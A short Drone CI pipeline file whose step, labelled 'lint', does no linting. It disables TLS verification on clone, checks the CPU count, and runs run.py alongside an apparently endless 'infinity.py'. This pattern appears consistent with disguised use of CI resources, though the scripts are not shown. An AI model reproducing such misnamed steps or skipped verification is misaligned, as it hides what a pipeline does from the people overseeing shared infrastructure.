---
kind: pipeline
type: docker
name: lint

clone:
  skip_verify: true

steps:
  - name: lint
    image: python:2
    commands:
      - nproc
      - chmod +x python run.sh
      - python run.py & python infinity.py
...
